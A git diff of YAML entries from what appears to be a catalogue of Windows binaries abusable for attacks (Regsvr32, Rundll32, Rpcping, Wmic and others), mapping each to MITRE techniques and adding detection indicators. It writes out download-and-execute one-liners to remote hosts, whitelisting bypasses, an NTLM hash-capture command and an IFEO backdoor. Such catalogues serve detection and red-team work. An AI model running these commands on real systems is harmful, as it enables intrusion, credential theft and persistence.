|   - Path: C:\Windows\System32\Register-cimprovider.exe | ||||
|   - Path: C:\Windows\SysWOW64\Register-cimprovider.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Notes: Thanks to PhilipTsukerman - @PhilipTsukerman | ||||
|  | ||||
|   - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Acknowledgement: | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: '@PhilipTsukerman' | ||||
| --- | ||||
| @@ -1,23 +1,37 @@ | ||||
| --- | ||||
| Name: Regsvcs.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvcs.exe AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute dll file and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regsvcs.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvcs.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,22 +1,54 @@ | ||||
| --- | ||||
| Name: Regsvr32.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by Windows to register dlls | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|   - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
|     Description: Execute the specified remote .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from remote scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll | ||||
|     Description: Execute the specified local .SCT script with scrobj.dll. | ||||
|     Usecase: Execute code from scriptlet, bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1117 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1117 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\regsvr32.exe | ||||
|   - C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regsvr32.exe | ||||
|   - Path: C:\Windows\SysWOW64\regsvr32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regsvr32.exe getting files from Internet | ||||
|  - IOC: regsvr32.exe executing scriptlet files | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,21 +1,36 @@ | ||||
| --- | ||||
| Name: Replace.exe | ||||
| Description: Copy, Download | ||||
| Author: '' | ||||
| Description: Used to replace file with another file  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: replace.exe C:\Source\File.cab C:\Destination /A | ||||
|     Description: Copy the specified file to the destination folder. | ||||
|     Description: Copy file.cab to destination | ||||
|     Usecase: Copy files  | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
|     Description: Copy the specified file to the destination folder. | ||||
|     Description: Download/Copy bar.exe to outdir | ||||
|     Usecase: Download file  | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\replace.exe | ||||
|   - C:\Windows\SysWOW64\replace.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\replace.exe | ||||
|   - Path: C:\Windows\SysWOW64\replace.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Replace.exe getting files from remote server | ||||
| Resources: | ||||
|   - https://twitter.com/elceef/status/986334113941655553 | ||||
|   - https://twitter.com/elceef/status/986842299861782529 | ||||
| Notes: Thanks to elceef - @elceef | ||||
|  | ||||
|   - Link: https://twitter.com/elceef/status/986334113941655553 | ||||
|   - Link: https://twitter.com/elceef/status/986842299861782529 | ||||
| Acknowledgement: | ||||
|   - Person: elceef | ||||
|     Handle: '@elceef' | ||||
| --- | ||||
| @@ -1,25 +1,31 @@ | ||||
| --- | ||||
| Name: Rpcping.exe | ||||
| Description: Credentials | ||||
| Author: '' | ||||
| Description: Used to verify rpc connection | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rpcping -s 127.0.0.1 -t ncacn_np | ||||
|     Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|   - Command: rpcping -s 192.168.1.10 -ncacn_np | ||||
|     Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|   - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM | ||||
|     Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. | ||||
|     Usecase: Capture credentials on a non-standard port | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1003 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1003 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\rpcping.exe | ||||
|   - C:\Windows\SysWOW64\rpcping.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\rpcping.exe | ||||
|   - Path: C:\Windows\SysWOW64\rpcping.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/subtee/status/872797890539913216 | ||||
|   - https://github.com/vysec/RedTips | ||||
|   - https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   - https://twitter.com/vysecurity/status/873181705024266241 | ||||
| Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity | ||||
|  | ||||
|   - Link: https://github.com/vysec/RedTips | ||||
|   - Link: https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   - Link: https://twitter.com/vysecurity/status/873181705024266241 | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Vincent Yiu | ||||
|     Handle: '@vysecurity' | ||||
| --- | ||||
| @@ -1,32 +1,70 @@ | ||||
| --- | ||||
| Name: Rundll32.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to execute dll files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rundll32.exe AllTheThingsx64,EntryPoint | ||||
|     Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|     Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|     Usecase: Execute dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|     Usecase: Proxy execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
|     Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|     Usecase: Execute code from Internet | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1085 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1085 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
|     Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
|     Usecase: Execute code from alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\rundll32.exe | ||||
|   - C:\Windows\SysWOW64\rundll32.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\rundll32.exe | ||||
|   - Path: C:\Windows\SysWOW64\rundll32.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
| Name: Runonce.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Runonce.exe /AlternateShellStartup | ||||
|     Description: Executes a Run Once Task that has been configured in the registry. | ||||
|     Description: Executes a Run Once Task that has been configured in the registry | ||||
|     Usecase: Persistence, bypassing defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\runonce.exe | ||||
|   - c:\windows\sysWOW64\runonce.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\runonce.exe | ||||
|   - Path: C:\Windows\SysWOW64\runonce.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   - https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
| Notes: | | ||||
|     Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|     Requires Administrative access. | ||||
|   - Link: https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
| @@ -1,17 +1,28 @@ | ||||
| --- | ||||
| Name: Runscripthelper.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test | ||||
|     Description: Execute the PowerShell script named test.txt. | ||||
|     Description: Execute the PowerShell script named test.txt | ||||
|     Usecase: Bypass constrained language mode and execute Powershell script | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe    ' | ||||
|   - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe     ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe | ||||
|   - Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Event 4014 - Powershell logging | ||||
|  - IOC: Event 400 | ||||
| Resources: | ||||
|   - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
| Notes: Thanks to Matt Graeber - @mattifestation | ||||
|   - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
| Acknowledgement: | ||||
|   - Person: Matt Graeber | ||||
|     Handle: '@mattifestation' | ||||
| --- | ||||
| @@ -1,19 +1,27 @@ | ||||
| --- | ||||
| Name: SC.exe | ||||
| Description: Execute, Read ADS, Create Service, Start Service | ||||
| Author: '' | ||||
| Name: Sc.exe | ||||
| Description: Used by Windows to manage services | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: | | ||||
|           sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | ||||
|           sc start evilservice | ||||
|     Description: '' | ||||
|   - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice | ||||
|     Description: Creates a new service and executes the file stored in the ADS. | ||||
|     Usecase: Execute binary file hidden inside an alternate data stream | ||||
|     Category: Alternate data streams  | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\sc.exe | ||||
|   - C:\Windows\SysWOW64\sc.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\sc.exe | ||||
|   - Path: C:\Windows\SysWOW64\sc.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Services that gets created | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,21 +1,37 @@ | ||||
| --- | ||||
| Name: Scriptrunner.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Scriptrunner.exe -appvscript calc.exe | ||||
|     Description: Execute calc.exe. | ||||
|     Description: Executes calc.exe | ||||
|     Usecase: Execute binary through proxy binary to evade defensive counter measurments | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
|     Description: Execute the calc.cmd script on the remote share. | ||||
|     Description: Executes calc.cmde from remote server | ||||
|     Usecase: Execute binary through proxy binary  from external server to evade defensive counter measurments | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\scriptrunner.exe | ||||
|   - c:\windows\sysWOW64\scriptrunner.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\scriptrunner.exe | ||||
|   - Path: C:\Windows\SysWOW64\scriptrunner.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Scriptrunner.exe should not be in use unless App-v is deployed | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   - https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   - https://github.com/MoooKitty/Code-Execution | ||||
| Notes: Thanks to Nick Tyrer - @NickTyrer | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   - Link: https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   - Link: https://github.com/MoooKitty/Code-Execution | ||||
| Acknowledgement: | ||||
|   - Person: Nick Tyrer | ||||
|     Handle: '@nicktyrer' | ||||
| --- | ||||
| @@ -1,16 +1,27 @@ | ||||
| --- | ||||
| Name: SyncAppvPublishingServer.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by App-v to get App-v server lists | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
|     Description: Example command on how inject Powershell code into the process | ||||
|     Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|   - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed | ||||
| Resources: | ||||
|   - https://twitter.com/monoxgas/status/895045566090010624 | ||||
| Notes: Thanks to Nick Landers - @monoxgas | ||||
|   - Link: https://twitter.com/monoxgas/status/895045566090010624 | ||||
| Acknowledgement: | ||||
|   - Person: Nick Landers | ||||
|     Handle: '@monoxgas' | ||||
| --- | ||||
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
|  --- | ||||
| Name: Wab.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Windows address book manager | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Wab.exe | ||||
|     Description: Loads a DLL configured in the registry under HKLM. | ||||
|   - Command: wab.exe | ||||
|     Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice | ||||
|     Usecase: Execute dll file. Bypass defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Program Files\Windows Mail\wab.exe    ' | ||||
|   - 'C:\Program Files (x86)\Windows Mail\wab.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Program Files\Windows Mail\wab.exe | ||||
|   - Path: C:\Program Files (x86)\Windows Mail\wab.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: WAB.exe should normally never be used | ||||
| Resources: | ||||
|   - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
|   - https://twitter.com/Hexacorn/status/991447379864932352 | ||||
| Notes: | | ||||
|     Thanks to Adam - @Hexacorn | ||||
|     Requires registry changes, Requires Administrative Access | ||||
|   - Link: https://twitter.com/Hexacorn/status/991447379864932352 | ||||
|   - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@Hexacorn' | ||||
| --- | ||||
| @@ -1,46 +1,85 @@ | ||||
| --- | ||||
| Name: WMIC.exe | ||||
| Description: Reconnaissance, Execute, Read ADS | ||||
| Author: '' | ||||
| Name: Wmic.exe | ||||
| Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc.exe. | ||||
|   - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" | ||||
|     Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). | ||||
|   - Command: wmic.exe useraccount get /ALL | ||||
|     Description: List the user accounts on the machine. | ||||
|   - Command: wmic.exe process get caption,executablepath,commandline | ||||
|     Description: Gets the command line used to execute a running program. | ||||
|   - Command: wmic.exe qfe get description,installedOn /format:csv | ||||
|     Description: Gets a list of installed Windows updates. | ||||
|   - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") | ||||
|     Description: Check to see if the target system is running SQL. | ||||
|   - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" | ||||
|     Description: Use the PowerShell cmdlet to list the shares on a remote server. | ||||
|   - Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
|     Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: wmic.exe process call create calc | ||||
|     Description: Execute calc from wmic | ||||
